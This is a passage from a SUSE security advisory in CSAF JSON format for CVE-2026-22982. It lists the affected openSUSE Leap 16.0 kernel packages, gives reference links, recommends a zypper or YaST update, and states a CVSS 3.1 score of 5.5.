"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22982",
"url": "https://www.suse.com/security/cve/CVE-2026-22982"
},
{
"category": "external",
"summary": "SUSE Bug 1257179 for CVE-2026-22982",
"url": "https://bugzilla.suse.com/1257179"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
